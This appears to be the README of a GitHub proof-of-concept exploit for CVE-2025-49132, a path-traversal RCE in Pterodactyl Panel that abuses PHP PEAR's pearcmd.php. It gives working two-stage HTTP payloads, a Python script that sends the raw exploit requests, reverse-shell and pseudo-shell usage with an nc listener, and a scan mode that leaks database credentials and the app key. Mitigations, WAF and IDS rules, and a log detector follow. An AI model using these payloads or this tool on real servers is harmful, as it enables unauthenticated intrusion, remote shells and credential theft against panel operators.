- Overview
- Vulnerability Details
- Technical Analysis
- Exploit Flow
- Installation
- Usage
- Examples
- Mitigation
- Disclaimer
- References
- Author
## Overview

This repository contains a proof-of-concept (PoC) exploit for CVE-2025-49132, a critical unauthenticated remote code execution vulnerability in Pterodactyl Panel versions prior to 1.11.11.

Pterodactyl Panel is a free, open-source game server management panel built with PHP (Laravel). The vulnerability is a path traversal in the `locale` and `namespace` parameters of the `/locales/locale.json` endpoint: the panel includes a PHP file whose path is assembled from those two user-controlled values. On its own that is an unauthenticated local file inclusion; combined with PHP PEAR's `pearcmd.php` (when PEAR is present on the target) it becomes execution of arbitrary system commands as the web server user.
## Vulnerability Details

- CVE ID: CVE-2025-49132
- CVSS Score: 10.0 (Critical)
- CVSS Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
- CWE: CWE-94: Improper Control of Generation of Code ('Code Injection')
- Affected Versions: Pterodactyl Panel < 1.11.11
- Attack Complexity: Low
- Privileges Required: None (Unauthenticated)
- User Interaction: None
## Technical Analysis

PHP PEAR (PHP Extension and Application Repository) is a framework and distribution system for reusable PHP components. It ships a command-line front end, `pearcmd.php`, for managing PEAR packages.

`pearcmd.php` reads its command line from `$_SERVER['argv']`. When PHP's `register_argc_argv` directive is on (the compiled-in default, which applies whenever no `php.ini` is deployed; `php.ini-production` turns it off), PHP also fills `$_SERVER['argv']` for web requests by splitting the raw query string on `+`. Including `pearcmd.php` through a path-traversal bug therefore hands an attacker its command line, which can be leveraged to:
- Create arbitrary PHP files on the system (the `config-create` command writes a config file that embeds attacker-supplied text)
- Execute those files through the web server

Note that this PEAR route needs both conditions on the target: PEAR installed at a guessable path (the PoC defaults to `/usr/share/php/PEAR` and can fuzz for others) and `register_argc_argv` enabled. The underlying file inclusion exists regardless.
The vulnerability exists because:
- Unvalidated path traversal: the `locale` parameter in `/locales/locale.json` allows path traversal without proper validation
- Direct file inclusion: the application directly includes files based on user-controlled input (`locale` and `namespace`)
- PEAR command injection: the `pearcmd.php` script accepts the `config-create` command, which can write arbitrary PHP files
- Unauthenticated access: the vulnerable endpoint doesn't require authentication
An attacker can:
- Use path traversal to reach the PEAR installation directory
- Abuse the `config-create` command to write malicious PHP code to `/tmp`
- Execute the malicious PHP file through the same endpoint
- Achieve full remote code execution as the web server user
The exploit works in two stages.

Stage 1 - write the payload with pearcmd's `config-create`:

```http
GET /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&<?=system('id')?>+/tmp/payload.php HTTP/1.1
Host: target.com
```

Breakdown:
- `+config-create+/` - invokes PEAR's config creation command
- `locale=../../../../../../usr/share/php/PEAR` - path traversal to the PEAR directory
- `namespace=pearcmd` - targets the `pearcmd.php` file
- `<?=system('id')?>+/tmp/payload.php` - PHP payload and destination file

Stage 2 - include the file that was just written:

```http
GET /locales/locale.json?locale=../../../../../../tmp&namespace=payload HTTP/1.1
Host: target.com
```

Breakdown:
- `locale=../../../../../../tmp` - path traversal to the `/tmp` directory
- `namespace=payload` - includes and executes `payload.php`

URL-encoding caveat: the PHP payload characters (`<`, `?`, `=`, `(`, `'`, `)`, `>`) must be sent in the URL without percent-encoding. PHP builds `$_SERVER['argv']` from the raw query string (split on `+`, nothing decoded), so the bytes that appear there are exactly what `config-create` writes into the file. If a client encodes them:
- `<?=system('id')?>` becomes `%3C%3F%3Dsystem%28%27id%27%29%3F%3E`, and PEAR writes that literal text into the file instead of PHP code
- The PHP tags are then not recognized when the file is included, so nothing executes

Most HTTP client libraries do this encoding for you: `requests`, for example, re-quotes any URL it is given and turns `<` and `>` into `%3C` and `%3E`. The PoC therefore has to place the payload in the request target verbatim.
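The two requests above, rebuilt as an added example for this page (this is not the PoC's own code), together with a simulation of how PHP turns the query string into `$_SERVER['argv']` so the encoding caveat is visible. `php_argv()` mirrors the `register_argc_argv` split (on `+`, with no percent-decoding); reading the empty first element as the slot `pearcmd` skips is this example's interpretation. Host, port and payload are placeholders.

```python
"""Raw request construction for the two exploit stages shown above.

Added example for this page, not the PoC's own code. php_argv() mirrors how
PHP's register_argc_argv turns the raw query string into $_SERVER['argv']
(split on '+', no percent-decoding). Host, port and payload are placeholders.
"""
import posixpath
import socket
from urllib.parse import quote

ENDPOINT = "/locales/locale.json"
UP = "../" * 6  # traversal depth used by the requests above


def stage1_target(pear_path: str, php_payload: str, out_file: str, endpoint: str = ENDPOINT) -> str:
    """Request target that makes pearcmd.php's config-create write php_payload into out_file."""
    return (
        f"{endpoint}?+config-create+/"
        f"&locale={UP}{pear_path.strip('/')}&namespace=pearcmd"
        f"&{php_payload}+{out_file}"
    )


def stage2_target(out_file: str, endpoint: str = ENDPOINT) -> str:
    """Request target that includes the written file through the same traversal."""
    directory, filename = posixpath.split(out_file)
    namespace = filename[:-4] if filename.endswith(".php") else filename
    return f"{endpoint}?locale={UP}{directory.strip('/')}&namespace={namespace}"


def php_argv(target: str) -> list:
    """$_SERVER['argv'] as PHP builds it from the query string: split on '+', nothing decoded.
    The leading '+' yields an empty argv[0], so 'config-create' sits at argv[1]."""
    query = target.split("?", 1)[1]
    return query.split("+")


def encoded_payload(php_payload: str) -> str:
    """What a form-encoding client (e.g. requests' params=) turns the payload into."""
    return quote(php_payload, safe="")


def raw_get(host: str, target: str) -> bytes:
    """Hand-built HTTP/1.1 request; the target goes on the wire byte-for-byte."""
    return f"GET {target} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()


def send_raw(host: str, target: str, port: int = 80, timeout: float = 10.0) -> bytes:
    """Send over a plain socket so no HTTP library re-quotes '<', '>' or the quotes."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(raw_get(host, target))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    payload = "<?=system('id')?>"
    stage1 = stage1_target("/usr/share/php/PEAR", payload, "/tmp/payload.php")
    print("stage 1:", stage1)
    print("argv seen by pearcmd:", php_argv(stage1))
    broken = stage1_target("/usr/share/php/PEAR", encoded_payload(payload), "/tmp/payload.php")
    print("argv if the client encoded the payload:", php_argv(broken))
    print("stage 2:", stage2_target("/tmp/payload.php"))
    # Against a live, authorized target (placeholder host):
    # send_raw("target.com", stage1)
    # send_raw("target.com", stage2_target("/tmp/payload.php"))
```

`send_raw` speaks plain HTTP; for an HTTPS target wrap the socket with `ssl.create_default_context().wrap_socket(sock, server_hostname=host)` before sending. Running the script offline shows the encoded variant reaching `pearcmd` as the literal string `%3C%3F%3D...`, which is the whole reason the PoC bypasses its HTTP library's quoting.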
## Exploit Flow

```mermaid
graph TD
A[Attacker] -->|1. Path Traversal Request| B[locale.json]
B -->|2. Traverse to PEAR| C[pearcmd.php]
C -->|3. config-create Command| D[Write PHP Payload]
D -->|4. Create File| E[payload.php]
E -->|5. File Created| F[Server Filesystem]
A -->|6. Execution Request| G[locale.json]
G -->|7. Traverse to tmp| E
E -->|8. Include and Execute| H[PHP Interpreter]
H -->|9. System Command| I[Shell Command]
I -->|10. Command Output| A
style A fill:#ff6b6b
style B fill:#4ecdc4
style C fill:#ffe66d
style E fill:#ff6b6b
style H fill:#ff6b6b
style I fill:#ff6b6b
```
```mermaid
sequenceDiagram
participant Attacker
participant Web Server
participant PEAR
participant Filesystem
participant PHP Engine
Attacker->>Web Server: GET locale.json with config-create
Web Server->>PEAR: Path Traversal to pearcmd
PEAR->>Filesystem: Create payload.php
Filesystem-->>Attacker: 200 OK
Attacker->>Web Server: GET locale.json with payload namespace
Web Server->>Filesystem: Path Traversal to payload.php
Filesystem->>PHP Engine: Include payload
PHP Engine->>PHP Engine: Execute system command
PHP Engine-->>Attacker: Command Output RCE
```
## Installation

Requirements:
- Python 3.6 or higher
- `requests` library

```bash
git clone https://github.com/xffsec/CVE-2025-49132_PEAR_METHOD.git
cd CVE-2025-49132_PEAR_METHOD
pip3 install -r requirements.txt
```

Or manually:

```bash
pip3 install requests
```

## Usage

Execute a single command:

```bash
python3 poc.py -H <target_host> -c "<command>"
```

Reverse shell:

```bash
# On attacker machine, start listener
nc -lvnp 4444

# Execute exploit with reverse shell
python3 poc.py -H <target_host> -r <your_ip>:4444
```

Interactive pseudo-shell:

```bash
python3 poc.py -H <target_host> --shell
```

Fuzz for PEAR installation paths:

```bash
python3 poc.py -H <target_host> --fuzz
```

Scan only (checks for CVE-2025-49132 via config leaks: database credentials, app key):

```bash
python3 poc.py -H <target_host> --scan
```

Custom PEAR path:

```bash
python3 poc.py -H <target_host> -c "whoami" -p "/opt/pear"
```

Verbose mode (shows detailed progress: payload creation, PEAR path, execution status):

```bash
python3 poc.py -H <target_host> -c "id" -v
```

Full option list:

```text
usage: poc.py [-h] -H HOST [-c COMMAND] [-r REVERSE_SHELL] [--shell] [--fuzz] [--scan]
              [-p PEAR_PATH] [-e ENDPOINT] [--ssl] [--timeout TIMEOUT] [-v]

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  Target host (e.g., 192.168.1.100 or example.com)
  -c COMMAND            Command to execute on target system
  -r REVERSE_SHELL      Reverse shell (format: LHOST:LPORT)
  --shell               Interactive pseudo-shell mode
  --fuzz                Fuzz for PEAR installation paths
  --scan                Scan target for vulnerability (config leaks)
  -p PEAR_PATH          Custom PEAR path (default: /usr/share/php/PEAR)
  -e ENDPOINT           Vulnerable endpoint (default: /locales/locale.json)
  --ssl                 Use HTTPS
  --timeout TIMEOUT     Request timeout in seconds (default: 10)
  -v, --verbose         Verbose progress output
```
## Examples

Basic command execution:

```text
$ python3 poc.py -H panel.pterodactyl.htb -c "id"
[CVE-2025-49132] Pterodactyl Panel RCE via PHP PEAR
[+] Command Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Use `-v` for verbose output (payload details, PEAR path, etc.).

Reverse shell:

```text
# Terminal 1: Start listener
$ nc -lvnp 4444
listening on [any] 4444 ...

# Terminal 2: Execute exploit
$ python3 poc.py -H panel.pterodactyl.htb -r 10.10.14.5:4444
╔══════════════════════════════════════╗
║ CVE-2025-49132 - Pterodactyl RCE ║
╚══════════════════════════════════════╝
[!] Make sure your listener is running: nc -lvnp 4444

# Terminal 1: Receive connection
connect to [10.10.14.5] from (UNKNOWN) [panel.pterodactyl.htb] 45678
www-data@pterodactyl:/var/www/pterodactyl$
```

Interactive pseudo-shell:

```text
$ python3 poc.py -H panel.pterodactyl.htb --shell
shell> whoami
www-data
shell> pwd
/var/www/pterodactyl
shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
shell> exit
```

Fuzzing for PEAR installation paths:

```text
$ python3 poc.py -H panel.pterodactyl.htb --fuzz
╔══════════════════════════════════════╗
║ CVE-2025-49132 - Pterodactyl RCE ║
╚══════════════════════════════════════╝
[+] Found 3 potential PEAR installation(s):
    /usr/share/php/PEAR
    /usr/share/pear
    /usr/local/lib/php/PEAR
[*] Use -p flag with one of these paths for exploitation
```

Use `-v` to see per-path fuzz progress.

Vulnerability scan (no payload is written; the check relies on reading the panel's configuration through the file inclusion):

```text
$ python3 poc.py -H panel.pterodactyl.htb --scan
╔══════════════════════════════════════╗
║ CVE-2025-49132 - Pterodactyl RCE ║
╚══════════════════════════════════════╝
[*] Scanning: http://panel.pterodactyl.htb/locales/locale.json
-------------------------------------------------------
[+] VULNERABLE - Database credentials leaked
    Host: 127.0.0.1
    Port: 3306
    Database: panel
    Username: pterodactyl
    Password: ********
    Connection: pterodactyl:********@127.0.0.1:3306/panel
[+] VULNERABLE - App configuration leaked
    App Key: base64{...}
    [!] SECURITY WARNING: APP_KEY exposed!
-------------------------------------------------------
[+] Target is VULNERABLE to CVE-2025-49132
```
## Mitigation

1. Update Pterodactyl Panel

   Update to version 1.11.11 or later:

   ```bash
   cd /var/www/pterodactyl
   php artisan p:upgrade
   ```

2. Disable the vulnerable endpoint (temporary workaround)

   `/locales/locale.json` is a Laravel route served by `public/index.php`, not a file on disk, so an Apache `<Files "locale.json">` block does not match it. Deny the request path instead.

   Apache (virtual host configuration, 2.4 syntax; `.htaccess` cannot contain `<Location>`, so there a `RewriteRule ^locales/locale\.json$ - [F]` placed before Laravel's front-controller rule does the same job):

   ```apache
   <Location "/locales/locale.json">
       Require all denied
   </Location>
   ```

   Nginx (inside the panel's `server` block; a regex `location` takes precedence over the `location /` that forwards to `index.php`):

   ```nginx
   location ~* /locales/locale\.json {
       deny all;
       return 403;
   }
   ```

   Note: this will break localization features, and it is a stopgap until the upgrade is applied.

3. Web Application Firewall (WAF)

   ModSecurity rules that block path traversal attempts. `ARGS` are inspected after URL decoding, so `%2e%2e/` is caught as well as a literal `../`; the `REQUEST_URI` rule covers the raw form:

   ```apache
   SecRule REQUEST_URI "@contains ../" "id:1000,phase:1,deny,status:403"
   SecRule ARGS "@contains ../" "id:1001,phase:2,deny,status:403"
   ```
For developers:
- Input validation: implement strict validation for the `locale` and `namespace` parameters
- Path sanitization: use `realpath()` to resolve the final path and verify it still lies inside the language directory
- Whitelist approach: only allow specific, predefined locale values
- Authentication: require authentication for locale endpoints
- Security audits: regular security assessments and penetration testing
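The allow-list and `realpath()` recommendations above, carried out as an added illustration for this page (not Pterodactyl's actual patch), in Python so the checks read language-neutrally. The `<base>/<locale>/<namespace>.php` layout mirrors a Laravel-style translation loader and is an assumption; the demo tree, including a hypothetical symlinked locale directory `ev -> /tmp`, is built under a temporary directory so the module runs stand-alone.

```python
"""Allow-list plus realpath() containment for a locale endpoint.

Added illustration for this page, not Pterodactyl's patch. Assumed layout:
<base>/<locale>/<namespace>.php. The demo tree is created in a temporary
directory; the 'ev' symlink is a hypothetical misconfiguration that shows why
the regex alone is not enough.
"""
import os
import re
import tempfile

# Strict allow-lists: "en", "pt_BR", ... for locale; word characters for namespace.
LOCALE_RE = re.compile(r"[a-z]{2,3}(?:_[A-Z]{2})?")
NAMESPACE_RE = re.compile(r"[A-Za-z0-9_]+")


def vulnerable_resolve(base_dir: str, locale: str, namespace: str) -> str:
    """The unsafe pattern: path assembled straight from request parameters."""
    return os.path.join(base_dir, locale, namespace + ".php")


def resolve_locale_file(base_dir: str, locale: str, namespace: str) -> str:
    """Return the absolute path of <base>/<locale>/<namespace>.php, or raise ValueError."""
    if not LOCALE_RE.fullmatch(locale):
        raise ValueError(f"locale rejected by allow-list: {locale!r}")
    if not NAMESPACE_RE.fullmatch(namespace):
        raise ValueError(f"namespace rejected by allow-list: {namespace!r}")
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, locale, namespace + ".php"))
    # realpath() follows symlinks, so a locale directory that links to a location
    # outside the base is caught here even though its name passed the regex.
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise ValueError(f"resolved path escapes the language directory: {candidate}")
    if not os.path.isfile(candidate):
        raise ValueError(f"no such locale file: {candidate}")
    return candidate


def build_demo_tree() -> str:
    """Create <tmp>/en/messages.php and a symlinked locale directory 'ev' -> /tmp."""
    base = tempfile.mkdtemp(prefix="lang-")
    os.makedirs(os.path.join(base, "en"))
    with open(os.path.join(base, "en", "messages.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php return ['hello' => 'Hello'];\n")
    try:
        os.symlink("/tmp", os.path.join(base, "ev"))  # hypothetical misconfiguration
    except OSError:
        pass  # without symlink support 'ev' is simply missing and still rejected
    return base


def demo() -> dict:
    """Run one legitimate request and three hostile ones through both resolvers."""
    base = build_demo_tree()
    hostile = {
        "traversal": ("../../../../../../tmp", "payload"),            # exploit stage 2
        "pear": ("../../../../../../usr/share/php/PEAR", "pearcmd"),  # exploit stage 1
        "symlink": ("ev", "messages"),                                # passes the regex
    }
    results = {"valid": resolve_locale_file(base, "en", "messages")}
    for label, (locale, namespace) in hostile.items():
        try:
            results[label] = resolve_locale_file(base, locale, namespace)
        except ValueError as err:
            results[label] = f"rejected: {err}"
    # What the unchecked resolver would have handed to include() for stage 2:
    results["vulnerable_path"] = os.path.normpath(vulnerable_resolve(base, *hostile["traversal"]))
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16} {value}")
```

The order of the checks matters: the regex rejects the two exploit requests before any filesystem access, and the `realpath()` containment check is the backstop for inputs the regex cannot judge, such as a directory name that is valid but points elsewhere.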
Log analysis - look for suspicious patterns:

```bash
# Apache/Nginx access logs
grep "locale.json" /var/log/apache2/access.log | grep "\.\."
grep "pearcmd" /var/log/apache2/access.log
grep "config-create" /var/log/apache2/access.log

# Look for recently written PHP files in world-writable locations
find /tmp \( -name "payload.php" -o -name "*.php" \) -mtime -1
```

Caveats: the `..` grep only matches a literal traversal; PHP URL-decodes the `locale` parameter, so `%2e%2e%2f` works just as well and should be searched for too. `payload.php` is only this PoC's default name; the attacker chooses the filename, and the PEAR stage can write to any directory the web server user can write to, not only `/tmp`.

IDS/IPS signature (Suricata/Snort syntax):

```text
alert http any any -> any any (msg:"CVE-2025-49132 PEAR RCE Attempt";
content:"/locales/locale.json"; http_uri;
content:"pearcmd"; http_uri;
content:"config-create"; http_uri;
sid:1000001; rev:1;)
```

This signature fires on the first stage only. The second stage, and the plain file read used by `--scan`, contain neither `pearcmd` nor `config-create`, so pair it with a rule keyed on `/locales/locale.json` together with `..` in the URI.
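The same detection logic run over access log lines, as an added example for this page (not part of the PoC repository). It extends the grep patterns by percent-decoding the request target first, so encoded traversal such as `%2e%2e%2f` is caught, and it distinguishes the `pearcmd`/`config-create` write from a bare traversal include. The log lines are constructed for the demonstration; the IPs, timestamps and user agents are placeholders.

```python
"""Detect CVE-2025-49132 exploitation attempts in combined-format access logs.

Added example for this page, not the PoC's code. The sample log lines below are
constructed; they follow the request shapes shown earlier on the page.
"""
import re
from urllib.parse import unquote

# Apache/Nginx "combined" log format, up to the status code.
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)

STAGE1 = "pearcmd-config-create"   # stage 1: write a PHP file through pearcmd
TRAVERSAL_LABEL = "traversal-include"  # stage 2, or a plain file-read probe


def classify_target(target: str):
    """Return a label for a suspicious request target, or None for a benign one."""
    decoded = unquote(target).lower()  # PHP decodes once; so do we
    if "/locales/locale.json" not in decoded:
        return None
    if "pearcmd" in decoded or "config-create" in decoded:
        return STAGE1
    if ".." in decoded:
        return TRAVERSAL_LABEL
    return None


def scan_log(lines):
    """Yield one finding per matching line, with the decoded target for analyst review."""
    findings = []
    for line in lines:
        match = COMBINED_LOG.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        label = classify_target(match.group("target"))
        if label:
            findings.append({
                "ip": match.group("ip"),
                "ts": match.group("ts"),
                "label": label,
                "target": unquote(match.group("target")),
            })
    return findings


SAMPLE_LOG = [  # constructed sample input
    '203.0.113.7 - - [16/Jun/2025:11:59:58 +0000] "GET /locales/locale.json?locale=en&namespace=messages HTTP/1.1" 200 842 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [16/Jun/2025:12:00:01 +0000] "GET /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&<?=system(\'id\')?>+/tmp/payload.php HTTP/1.1" 200 512 "-" "python-requests/2.31.0"',
    '10.10.14.5 - - [16/Jun/2025:12:00:02 +0000] "GET /locales/locale.json?locale=../../../../../../tmp&namespace=payload HTTP/1.1" 200 61 "-" "python-requests/2.31.0"',
    '198.51.100.9 - - [16/Jun/2025:12:03:40 +0000] "GET /locales/locale.json?locale=%2e%2e%2f%2e%2e%2fconfig&namespace=database HTTP/1.1" 200 390 "-" "curl/8.5.0"',
    '203.0.113.7 - - [16/Jun/2025:12:04:10 +0000] "GET /api/client HTTP/1.1" 401 95 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['ts']}  {finding['ip']:14}  {finding['label']:22}  {finding['target']}")
```

Point `scan_log` at `open("/var/log/apache2/access.log")` (or the Nginx equivalent) to run it on real data. The fourth sample line is the kind of request the grep commands above would miss, and a `pearcmd-config-create` hit followed within seconds by a `traversal-include` from the same address is the exploit's full two-stage pattern.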
## Disclaimer

FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY
This proof-of-concept exploit is provided for educational purposes and authorized security testing only. The author assumes no liability for misuse or damage caused by this program.
- ✅ DO: Use this tool for authorized penetration testing and security research
- ✅ DO: Use this tool on systems you own or have explicit permission to test
- ✅ DO: Use this tool to verify patches and security controls
- ❌ DON'T: Use this tool against systems without explicit authorization
- ❌ DON'T: Use this tool for malicious purposes
- ❌ DON'T: Deploy this tool in production environments without proper controls
Unauthorized access to computer systems is illegal. Users are responsible for ensuring compliance with applicable laws and regulations.
## References

- CVE-2025-49132 - NVD
- GitHub Advisory: GHSA-24wv-6c99-f843
- Pterodactyl Panel Security Advisory
- PHP PEAR Documentation
- CWE-94: Code Injection
## Author

xffsec
| Contact |
|---|
| GitHub: @xffsec |
| Email: xffsec@gmail.com |
This project is licensed under the MIT License - see the LICENSE file for details.
Contributions, issues, and feature requests are welcome! Feel free to open an issue or submit a pull request.
- Pterodactyl Panel development team for their responsible disclosure process
- The security research community
- HackTheBox for providing a safe environment to practice these techniques